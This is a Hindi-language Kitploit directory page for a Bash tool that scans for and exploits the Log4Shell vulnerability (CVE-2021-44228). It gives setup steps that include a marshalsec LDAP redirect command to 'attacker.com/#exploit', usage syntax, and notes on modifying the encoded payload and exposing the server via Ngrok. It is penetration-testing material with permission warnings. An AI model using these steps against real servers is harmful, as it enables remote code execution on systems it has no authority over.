Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4j-Scanner-Exploit — बैश स्क्रिप्ट जो Log4j भेद्यता CVE-2021-44228 की पहचान दूरस्थ रूप से करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/julian911015/log4j-scanner-exploit
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubjulian911015/log4j-scanner-exploit

Log4j-Scanner-Exploit

बैश स्क्रिप्ट जो Log4j भेद्यता CVE-2021-44228 की पहचान दूरस्थ रूप से करने की अनुमति देती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

Log4Shell-Scanner-Exploit

बैश स्क्रिप्ट जो Log4shell कमजोरी की पहचान और/या दूरस्थ रूप से शोषण करने की अनुमति देती है। यह उपकरण LDAP पेलोड और X-Api-Version, User-Agent तथा X-Forwarded-For हेडर का उपयोग करके विभिन्न परीक्षण करता है।

हमेशा इस स्क्रिप्ट का उपयोग ऑडिट किए गए सेवा/एप्लिकेशन के स्वामी की पूर्व अनुमति से करें।

निर्भरताएँ:

  1. हम Github से एक पूर्व-कॉन्फ़िगर्ड LDAP सर्वर बनाएंगे: https://github.com/mbechler/marshalsec

mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar

marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'

  1. हम एक HTTP सर्वर सक्षम करते हैं python3 -m http.server 8080

  2. Java इंस्टॉल होना चाहिए #sudo apt install default-jre

  3. Curl इंस्टॉल होना चाहिए #sudo apt-get install curl

उपयोग का उदाहरण:

निम्नलिखित पैरामीटर दर्ज करें:

  • स्कैन करने के लिए URL की सूची
  • LDAP सर्वर का IP पता
  • LDAP सर्वर पोर्ट
  • HTTP सर्वर का IP पता
  • HTTP सर्वर पोर्ट

#इंटरनल नेटवर्क पर एप्लिकेशन स्कैनिंग का उदाहरण:

  • ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

image

#इंटरनेट पर एप्लिकेशन स्कैनिंग का उदाहरण:

  • ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

image

स्पष्टीकरण:

  • उपयोग किया गया पेलोड कमजोर पहचानी गई मशीनों को "ifconfig" कमांड भेजता है, यह पेलोड Base64 में एन्कोडेड है और इसे पेंटेस्टिंग ऑडिट में शोषण चरण को अंजाम देने के लिए संशोधित किया जा सकता है।
  • यदि आप उपकरण को इंटरनेट सेवाओं में उपयोग करना चाहते हैं, तो आप Ngrok सेवा शुरू कर सकते हैं जो LDAP सर्वर के स्थानीय पोर्ट पर पोर्ट फ़ॉरवर्डिंग करती है।
  • इस स्क्रिप्ट का उपयोग हमेशा विश्लेषित सेवा/एप्लिकेशन के स्वामी की पूर्व अनुमति के साथ करें।
टूल डाउनलोड करें